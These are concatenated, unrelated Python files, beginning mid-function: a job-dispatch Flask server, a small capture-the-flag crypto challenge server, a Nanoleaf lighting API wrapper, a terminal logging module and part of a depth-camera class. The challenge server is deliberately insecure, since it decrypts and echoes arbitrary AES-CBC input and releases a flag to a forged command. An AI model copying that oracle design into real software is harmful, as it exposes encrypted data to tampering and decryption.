global JOB_PROCESSES
global WORKERS
global EXEC_MODE
global LOCALHOST_MANAGER_PROCESS
job_payload = flask.request.get_json(force=True, silent=True)
if job_payload and not isinstance(job_payload, dict):
return error('The action did not receive a dictionary as an argument.')
try:
runtime = job_payload['runtime_name']
verify_runtime_name(runtime)
except Exception as e:
return error(str(e))
job_key = job_payload['job_key']
logger.info('Received job {}'.format(job_key))
BUDGET_KEEPER.last_usage_time = time.time()
BUDGET_KEEPER.update_config(job_payload['config']['standalone'])
BUDGET_KEEPER.jobs[job_key] = 'running'
EXEC_MODE = job_payload['config']['standalone'].get('exec_mode', 'consume')
if EXEC_MODE == 'consume':
work_queue = WORK_QUEUES.setdefault('local', MP_MANAGER.Queue())
if not LOCALHOST_MANAGER_PROCESS:
logger.debug('Starting manager process for localhost jobs')
lmp = mp.Process(target=run_job_local, args=(work_queue,))
lmp.daemon = True
lmp.start()
LOCALHOST_MANAGER_PROCESS = lmp
logger.info(f'Putting job {job_key} into master queue')
work_queue.put(job_payload)
elif EXEC_MODE == 'create':
# Create mode runs the job in worker VMs
logger.debug(f'Starting process for job {job_key}')
work_queue = MP_MANAGER.Queue()
WORK_QUEUES[job_key] = work_queue
jp = mp.Process(target=run_job_worker, args=(job_payload, work_queue, WORKERS))
jp.daemon = True
jp.start()
JOB_PROCESSES[job_key] = jp
elif EXEC_MODE == 'reuse':
# Reuse mode runs the job on running workers
# TODO: Consider to add support to manage pull of available workers
# TODO: Spawn only the missing delta of workers
logger.debug(f'Starting process for job {job_key}')
work_queue = WORK_QUEUES.setdefault('all', MP_MANAGER.Queue())
jp = mp.Process(target=run_job_worker, args=(job_payload, work_queue, WORKERS))
jp.daemon = True
jp.start()
JOB_PROCESSES[job_key] = jp
act_id = str(uuid.uuid4()).replace('-', '')[:12]
response = flask.jsonify({'activationId': act_id})
response.status_code = 202
return response
@app.route('/ping', methods=['GET'])
def ping():
response = flask.jsonify({'response': 'pong'})
response.status_code = 200
return response
@app.route('/preinstalls', methods=['GET'])
def preinstalls():
global LOCALHOST_HANDLER
payload = flask.request.get_json(force=True, silent=True)
if payload and not isinstance(payload, dict):
return error('The action did not receive a dictionary as an argument.')
try:
runtime = payload['runtime']
verify_runtime_name(runtime)
except Exception as e:
return error(str(e))
pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
localhost_handler = LocalhostHandler({'runtime': runtime, 'pull_runtime': pull_runtime})
localhost_handler.init()
runtime_meta = localhost_handler.create_runtime(runtime)
localhost_handler.clear()
logger.info(runtime_meta)
response = flask.jsonify(runtime_meta)
response.status_code = 200
return response
def main():
global STANDALONE_CONFIG
global STANDALONE_HANDLER
global BUDGET_KEEPER
global MASTER_IP
os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
with open(STANDALONE_CONFIG_FILE, 'r') as cf:
STANDALONE_CONFIG = json.load(cf)
# Delete ssh_key_filename
backend = STANDALONE_CONFIG['backend']
if 'ssh_key_filename' in STANDALONE_CONFIG[backend]:
del STANDALONE_CONFIG[backend]['ssh_key_filename']
vm_data_file = os.path.join(STANDALONE_INSTALL_DIR, 'access.data')
with open(vm_data_file, 'r') as ad:
MASTER_IP = json.load(ad)['ip_address']
BUDGET_KEEPER = BudgetKeeper(STANDALONE_CONFIG)
BUDGET_KEEPER.start()
STANDALONE_HANDLER = BUDGET_KEEPER.sh
server = WSGIServer(('0.0.0.0', STANDALONE_SERVICE_PORT),
app, log=app.logger)
server.serve_forever()
if __name__ == '__main__':
main()
|
babycrypto2.py
|
#!/usr/bin/env python
from base64 import b64decode
from base64 import b64encode
import socket
import multiprocessing
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import hashlib
import sys
class AESCipher:
def __init__(self, key):
self.key = key
def encrypt(self, data):
iv = get_random_bytes(AES.block_size)
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def encrypt_iv(self, data, iv):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def decrypt(self, data):
raw = b64decode(data)
self.cipher = AES.new(self.key, AES.MODE_CBC, raw[:AES.block_size])
return unpad(self.cipher.decrypt(raw[AES.block_size:]), AES.block_size)
flag = open("flag", "rb").read().strip()
AES_KEY = get_random_bytes(AES.block_size)
TOKEN = b64encode(get_random_bytes(AES.block_size*10-1))
COMMAND = [b'test',b'show']
PREFIX = b'Command: '
def run_server(client):
client.send(b'test Command: ' + AESCipher(AES_KEY).encrypt(PREFIX+COMMAND[0]+TOKEN) + b'\n')
while(True):
client.send(b'Enter your command: ')
tt = client.recv(1024).strip()
tt2 = AESCipher(AES_KEY).decrypt(tt)
client.send(tt2 + b'\n')
if tt2 == PREFIX+COMMAND[1]+TOKEN:
client.send(b'The flag is: ' + flag)
client.close()
break
if __name__ == '__main__':
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 16002))
server.listen(1)
while True:
client, address = server.accept()
process = multiprocessing.Process(target=run_server, args=(client, ))
process.daemon = True
process.start()
|
nanoleaf.py
|
"""nanoleafapi
This module is a Python 3 wrapper for the Nanoleaf OpenAPI.
It provides an easy way to use many of the functions available in the API.
It supports the Light Panels (previously Aurora), Canvas and Shapes (including Hexgaons)."""
import json
from threading import Thread
import colorsys
import os
from typing import Any, List, Dict, Tuple, Union, Callable
from sseclient import SSEClient
import requests
# Preset colours
RED = (255, 0, 0)
ORANGE = (255, 165, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
LIGHT_BLUE = (173, 216, 230)
BLUE = (0, 0, 255)
PINK = (255, 192, 203)
PURPLE = (128, 0, 128)
WHITE = (255, 255, 255)
class Nanoleaf():
"""The Nanoleaf class for controlling the Light Panels and Canvas
:ivar ip: IP of the Nanoleaf device
:ivar url: The base URL for requests
:ivar auth_token: The authentication token for the API
:ivar print_errors: True for errors to be shown, otherwise False
"""
def __init__(self, ip : str, auth_token : str =None, print_errors : bool =False):
"""Initalises Nanoleaf class with desired arguments.
:param ip: The IP address of the Nanoleaf device
:param auth_token: Optional, include Nanoleaf authentication
token here if required.
:param print_errors: Optional, True to show errors in the console
:type ip: str
:type auth_token: str
:type print_errors: bool
"""
self.ip = ip
self.print_errors = print_errors
self.url = "http://" + ip + ":16021/api/v1/" + str(auth_token)
self.check_connection()
if auth_token is None:
self.auth_token = self.create_auth_token()
if self.auth_token is None:
raise NanoleafRegistrationError()
else:
self.auth_token = auth_token
self.url = "http://" + ip + ":16021/api/v1/" + str(self.auth_token)
self.already_registered = False
def __error_check(self, code : int) -> bool:
"""Checks and displays error messages
Determines the request status code and prints the error, if print_errors
is true.
:param code: The error code
:returns: Returns True if request was successful, otherwise False
"""
if self.print_errors:
if code in (200, 204):
print(str(code) + ": Action performed successfully.")
return True
if code == 400:
print("Error 400: Bad request.")
elif code == 401:
print("Error 401: Unauthorized, invalid auth token. " +
"Please generate a new one.")
elif code == 403:
print("Error 403: Unauthorized, please hold the power " +
"button on the controller for 5-7 seconds, then try again.")
elif code == 404:
print("Error 404: Resource not found.")
elif code == 500:
print("Error 500: Internal server error.")
return False
return bool(code in (200, 204))
def create_auth_token(self) -> Union[str, None]:
"""Creates or retrives the device authentication token
The power button on the device should be held for 5-7 seconds, then
this method should be run. This will set both the auth_token and url
instance variables, and save the token in a file for future instances
of the Nanoleaf object.
:returns: Token if successful, None if not.
"""
file_path = os.path.expanduser('~') + os.path.sep + '.nanoleaf_token'
if os.path.exists(file_path) is False:
with open(file_path, 'w'):
pass
with open(file_path, 'r') as token_file:
tokens = token_file.readlines()
for token in tokens:
if token != "":
token = token.rstrip()
response = requests.get("http://" + self.ip + ":16021/api/v1/" + str(token))
if self.__error_check(response.status_code):
return token
response = requests.post('http://' + self.ip + ':16021/api/v1/new')
# process response
if response and response.status_code == 200:
data = json.loads(response.text)
if 'auth_token' in data:
open(file_path, 'a').write("\n" + data['auth_token'])
return data['auth_token']
return None
def delete_auth_token(self, auth_token : str) -> bool:
"""Deletes an authentication token
Deletes an authentication token and the .nanoleaf_token file if it
contains the auth token to delete. This token can no longer be used
as part of an API call to control the device. If required, generate
a new one using create_auth_token().
:param auth_token: The authentication token to delete.
:returns: True if successful, otherwise False
"""
url = "http://" + self.ip + ":16021/api/v1/" + str(auth_token)
response = requests.delete(url)
return self.__error_check(response.status_code)
def check_connection(self) -> None:
"""Ensures there is a valid connection"""
try:
requests.get(self.url, timeout=5)
except Exception as connection_error:
raise NanoleafConnectionError() from connection_error
def get_info(self) -> Dict[str, Any]:
"""Returns a dictionary of device information"""
response = requests.get(self.url)
return json.loads(response.text)
def get_name(self) -> str:
"""Returns the name of the current device"""
return self.get_info()['name']
def get_auth_token(self) -> str:
"""Returns the current auth token"""
return self.auth_token
def get_ids(self) -> List[int]:
"""Returns a list of all device ids"""
position_data = []
device_ids = []
info_data = self.get_info()
if ('panelLayout' in info_data and 'layout' in info_data['panelLayout'] and
'positionData' in info_data['panelLayout']['layout']):
position_data = info_data['panelLayout']['layout']['positionData']
# process position data
for data in position_data:
device_ids.append(data['panelId'])
return device_ids
@staticmethod
def get_custom_base_effect(anim_type : str ='custom', loop : bool =True) -> Dict[str, Any]:
"""Returns base custom effect dictionary"""
base_effect = {
'command': 'display',
'animType': anim_type,
'loop': loop,
'palette': []
}
return base_effect
#######################################################
#### POWER ####
#######################################################
def power_off(self) -> bool:
"""Powers off the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": False}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def power_on(self) -> bool:
"""Powers on the lights
:returns: True if successful, otherwise False
"""
data = {"on" : {"value": True}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_power(self) -> bool:
"""Returns the power status of the lights
:returns: True if on, False if off
"""
response = requests.get(self.url + "/state/on")
ans = json.loads(response.text)
return ans['value']
def toggle_power(self) -> bool:
"""Toggles the lights on/off"""
if self.get_power():
return self.power_off()
return self.power_on()
#######################################################
#### COLOUR ####
#######################################################
def set_color(self, rgb : Tuple[int, int, int]) -> bool:
"""Sets the colour of the lights
:param rgb: Tuple in the format (r, g, b)
:returns: True if successful, otherwise False
"""
hsv_colour = colorsys.rgb_to_hsv(rgb[0]/255, rgb[1]/255, rgb[2]/255)
hsv_colour_list = list(hsv_colour)
hsv_colour_list[0] *= 360
hsv_colour_list[1] *= 100
hsv_colour_list[2] *= 100
final_colour = [ int(x) for x in hsv_colour_list ]
data = {
"hue" : {"value": final_colour[0]},
"sat": {"value": final_colour[1]},
"brightness": {"value": final_colour[2], "duration": 0}
}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
#######################################################
#### ADJUST BRIGHTNESS ####
#######################################################
def set_brightness(self, brightness : int, duration : int =0) -> bool:
"""Sets the brightness of the lights
:param brightness: The required brightness (between 0 and 100)
:param duration: The duration over which to change the brightness
:returns: True if successful, otherwise False
"""
if brightness > 100 or brightness < 0:
raise ValueError('Brightness should be between 0 and 100')
data = {"brightness" : {"value": brightness, "duration": duration}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_brightness(self, brightness : int) -> bool:
"""Increments the brightness of the lights
:param brightness: How much to increment the brightness, can
also be negative
:returns: True if successful, otherwise False
"""
data = {"brightness" : {"increment": brightness}}
response = requests.put(self.url + "/state", data = json.dumps(data))
return self.__error_check(response.status_code)
def get_brightness(self) -> int:
"""Returns the current brightness value of the lights"""
response = requests.get(self.url + "/state/brightness")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### IDENTIFY ####
#######################################################
def identify(self) -> bool:
"""Runs the identify sequence on the lights
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/identify")
return self.__error_check(response.status_code)
#######################################################
#### HUE ####
#######################################################
def set_hue(self, value : int) -> bool:
"""Sets the hue of the lights
:param value: The required hue (between 0 and 360)
:returns: True if successful, otherwise False
"""
if value > 360 or value < 0:
raise ValueError('Hue should be between 0 and 360')
data = {"hue" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_hue(self, value : int) -> bool:
"""Increments the hue of the lights
:param value: How much to increment the hue, can also be negative
:returns: True if successful, otherwise False
"""
data = {"hue" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_hue(self) -> int:
"""Returns the current hue value of the lights"""
response = requests.get(self.url + "/state/hue")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### SATURATION ####
#######################################################
def set_saturation(self, value : int) -> bool:
"""Sets the saturation of the lights
:param value: The required saturation (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 100 or value < 0:
raise ValueError('Saturation should be between 0 and 100')
data = {"sat" : {"value" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def increment_saturation(self, value : int) -> bool:
"""Increments the saturation of the lights
:param brightness: How much to increment the saturation, can also be
negative.
:returns: True if successful, otherwise False
"""
data = {"sat" : {"increment" : value}}
response = requests.put(self.url + "/state", data=json.dumps(data))
return self.__error_check(response.status_code)
def get_saturation(self) -> int:
"""Returns the current saturation value of the lights"""
response = requests.get(self.url + "/state/sat")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR TEMPERATURE ####
#######################################################
def set_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: The required colour temperature (between 0 and 100)
:returns: True if successful, otherwise False
"""
if value > 6500 or value < 1200:
raise ValueError('Colour temp should be between 1200 and 6500')
data = {"ct" : {"value" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def increment_color_temp(self, value : int) -> bool:
"""Sets the white colour temperature of the lights
:param value: How much to increment the colour temperature by, can also
be negative.
:returns: True if successful, otherwise False
"""
data = {"ct" : {"increment" : value}}
response = requests.put(self.url + "/state", json.dumps(data))
return self.__error_check(response.status_code)
def get_color_temp(self) -> int:
"""Returns the current colour temperature of the lights"""
response = requests.get(self.url + "/state/ct")
ans = json.loads(response.text)
return ans['value']
#######################################################
#### COLOUR MODE ####
#######################################################
def get_color_mode(self) -> str:
"""Returns the colour mode of the lights"""
response = requests.get(self.url + "/state/colorMode")
return json.loads(response.text)
#######################################################
#### EFFECTS ####
#######################################################
def get_current_effect(self) -> str:
"""Returns the currently selected effect
If the name of the effect isn't available, this will return
*Solid*, *Dynamic* or *Static* instead.
:returns: Name of the effect or type if unavailable.
"""
response = requests.get(self.url + "/effects/select")
return json.loads(response.text)
def set_effect(self, effect_name : str) -> bool:
"""Sets the effect of the lights
:param effect_name: The name of the effect
:returns: True if successful, otherwise False
"""
data = {"select": effect_name}
response = requests.put(self.url + "/effects", data=json.dumps(data))
return self.__error_check(response.status_code)
def list_effects(self) -> List[str]:
"""Returns a list of available effects"""
response = requests.get(self.url + "/effects/effectsList")
return json.loads(response.text)
def write_effect(self, effect_dict : Dict['str', Any]) -> bool:
"""Writes a user-defined effect to the panels
:param effect_dict: The effect dictionary in the format
described here: https://forum.nanoleaf.me/docs/openapi#_u2t4jzmkp8nt
:raises NanoleafEffectCreationError: When invalid effect dictionary is provided.
:returns: True if successful, otherwise False
"""
response = requests.put(self.url + "/effects", data=json.dumps({"write": effect_dict}))
if response.status_code == 400:
raise NanoleafEffectCreationError("Invalid effect dictionary")
return self.__error_check(response.status_code)
def effect_exists(self, effect_name : str) -> bool:
"""Verifies whether an effect exists
:param effect_name: Name of the effect to verify
:returns: True if effect exists, otherwise False
"""
response = requests.get(self.url + "/effects/effectsList")
if effect_name in json.loads(response.text):
return True
return False
def pulsate(self, rgb : Tuple[int, int, int], speed : float = 1) -> bool:
"""Displays a pulsating effect on the device with two colours
:param rgb: A tuple containing the RGB colour to pulsate in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb value is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in rgb:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must be " +
"integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} 2".format(id=device_id)
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed} 0 0 0 0 {speed_2}".format(
r=r, g=g, b=b, speed=int(speed*10), speed_2=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def flow(self, rgb_list : List[Tuple[int, int, int]], speed : float = 1) -> bool:
"""Displays a sequence of specified colours on the device.
:param rgb: A list of tuples containing RGB colours to flow between in the format (r, g, b).
:param speed: The speed of the transition between colours in seconds, with a maximum of
1 decimal place.
:raises NanoleafEffectCreationError: When an invalid rgb_list is provided.
:returns: True if the effect was created and displayed successfully, otherwise False
"""
if len(rgb_list) <= 1:
raise NanoleafEffectCreationError("There has to be more than one tuple in " +
"the RGB list for this effect! E.g., [(255, 0, 0), (0, 0, 0)]")
for tup in rgb_list:
if len(tup) != 3:
raise NanoleafEffectCreationError("There must be three values in the " +
"RGB tuple! E.g., (255, 0, 0)")
for colour in tup:
if not isinstance(colour, int):
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers! E.g., (255, 0, 0)")
if colour < 0 or colour > 255:
raise NanoleafEffectCreationError("All values in the tuple must " +
"be integers between 0 and 255! E.g., (255, 0, 0)")
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id, numFrames=len(rgb_list))
for rgb in rgb_list:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
def spectrum(self, speed : float = 1) -> bool:
"""Displays a spectrum cycling effect on the device
:param speed: The speed of the transition between colours in seconds,
with a maximum of 1 decimal place.
:returns: True if the effect was created and displayed successfully,
otherwise False
"""
base_effect = self.get_custom_base_effect()
ids = self.get_ids()
spectrum_palette = []
for hue in range(0, 360, 10):
(r, g, b) = colorsys.hsv_to_rgb(hue/360, 1.0, 1.0)
spectrum_palette.append((int(255*r), int(255*g), int(255*b)))
anim_data = str(len(ids))
frame_string = ""
for device_id in ids:
frame_string += " {id} {numFrames}".format(id=device_id,
numFrames=len(spectrum_palette))
for rgb in spectrum_palette:
r, g, b = rgb[0], rgb[1], rgb[2]
frame_string += " {r} {g} {b} 0 {speed}".format(r=r, g=g, b=b, speed=int(speed*10))
base_effect['animData'] = anim_data + frame_string
return self.write_effect(base_effect)
#######################################################
#### LAYOUT ####
#######################################################
def get_layout(self) -> Dict[str, Any]:
"""Returns the device layout information"""
response = requests.get(self.url + "/panelLayout/layout")
return json.loads(response.text)
#######################################################
#### EVENTS ####
#######################################################
def register_event(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Starts a thread to register and listen for events
Creates an event listener. This method can only be called once per
program run due to API limitations.
:param func: The function to run when an event is recieved (this
should be defined by the user with one argument). This function
will recieve the event as a dictionary.
:param event_types: A list containing up to 4 numbers from
1-4 corresponding to the relevant events to be registered for.
1 = state (power/brightness),
2 = layout,
3 = effects,
4 = touch (Canvas only)
"""
if self.already_registered:
print("Cannot register events more than once.")
return
if len(event_types) > 4 or len(event_types) < 1:
raise Exception("The number of events to register for must be" +
"between 1-4")
for event in event_types:
if event < 1 or event > 4:
raise Exception("Valid event types must be between 1-4")
self.already_registered = True
thread = Thread(target=self.__event_listener, args=(func, set(event_types)))
thread.daemon = True
thread.start()
def __event_listener(self, func : Callable[[Dict[str, Any]], Any],
event_types : List[int]) -> None:
"""Listens for events and passes event data to the user-defined
function."""
url = self.url + "/events?id="
for event in event_types:
url += str(event) + ","
client = SSEClient(url[:-1])
for event in client:
func(json.loads(str(event)))
#######################################################
#### ERRORS ####
#######################################################
class NanoleafRegistrationError(Exception):
"""Raised when an issue during device registration."""
def __init__(self) -> None:
message = """Authentication token generation failed. Hold the power
button on your Nanoleaf device for 5-7 seconds and try again."""
super().__init__(message)
class NanoleafConnectionError(Exception):
"""Raised when the connection to the Nanoleaf device fails."""
def __init__(self) -> None:
message = "Connection to Nanoleaf device failed. Is this the correct IP?"
super().__init__(message)
class NanoleafEffectCreationError(Exception):
"""Raised when one of the custom effects creation has incorrect arguments."""
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
from . import filesystem
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
GREEN = "\033[32m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
pyre_directory = filesystem.make_pyre_directory()
file_handler = logging.FileHandler(os.path.join(pyre_directory, "pyre.stderr"))
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "DUMP":
LOG.warning(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
camera_t265.py
|
#!/usr/bin/env python3
import sys
sys.path.append("/usr/local/lib/")
import os
import time
from threading import Thread
import transformations as tf
import numpy as np
import math as m
import csv
import pyrealsense2 as rs
from mycelium.components import Camera, RedisBridge
class CameraT265(Camera):
def __init__(self):
self.enable_pose_stream = False
super().__init__(Camera.TYPE_T265)
self._setup_save_dir()
def _setup_parameters(self):
self.scale_factor = self.cfg.t265['scale_factor']
self.jump_threshold = self.cfg.t265['jump_threshold']
self.jump_speed_threshold = self.cfg.t265['jump_speed_threshold']
self.compass_enabled = self.cfg.t265['compass_enabled']
self.heading_north_yaw = None
self.rb_0 = RedisBridge(db=self.rd_cfg.databases['robot'])
if self.compass_enabled:
att = self.rb_0.get_key('ATTITUDE')
if att is not None:
self.heading_north_yaw = att['yaw']
else:
self.compass_enabled = False
self.logger.log_warn("Failed to enable compass, could not retrieve attitude yaw")
self._initialize_compute_vars()
# body offset - see initial script
self.metadata = ['enable_pose_stream']
def _initialize_compute_vars(self):
self.prev_data = None
self.reset_counter = 1
self.current_confidence_level= None
# Initialize with camera orientation
self.H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
xr = m.radians(self.cfg.t265['camera_rot_x'])
yr = m.radians(self.cfg.t265['camera_rot_y'])
zr = m.radians(self.cfg.t265['camera_rot_z'])
self.H_T265body_aeroBody = (tf.euler_matrix(xr, yr, zr)).dot(np.linalg.inv(self.H_aeroRef_T265Ref))
self.H_aeroRef_aeroBody = None
# V_aeroRef_aeroBody # vision speed estimate message
# H_aeroRef_PrevAeroBody # vision position delta message
self.frames = None
self.pose_estimate_data = None
def _setup_threads(self):
super()._setup_threads()
self.threads.append(Thread(target=self._save_pos_estimate))
def _save_pos_estimate(self):
csv_file = self.save_data_dir + 't265_pos_estimate.csv'
file_exists = os.path.exists(csv_file)
with open(csv_file, 'a+', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
if not file_exists:
header = [
'current_time_us',
'local_x_pos',
'local_y_pos',
'local_z_pos',
'roll_angle',
'pitch_angle',
'yaw_angle',
'covariance',
'reset_counter',
'gps_1_lat',
'gps_1_lon',
'gps_1_fix_type',
'gps_2_lat',
'gps_2_lon',
'gps_2_fix_type'
]
csvwriter.writerow(header)
while not self.exit_threads:
self.rb_i.add_key(self.pose_estimate_data, self.camera_type, 'vision_position_estimate', expiry=self.cfg.t265['save_redis_expiry'])
self._save_csv(csvwriter, self.pose_estimate_data)
def _save_csv(self, csvwriter, data):
if data:
try:
data += self._get_gps_data()
csvwriter.writerow(data)
except Exception as e:
self.logger.log_warn("Could not write pose data to csv: %s" % e)
def _realsense_notification_callback(notif):
self.logger.log_info(notif)
def _open_pipe(self):
self.pipe = rs.pipeline()
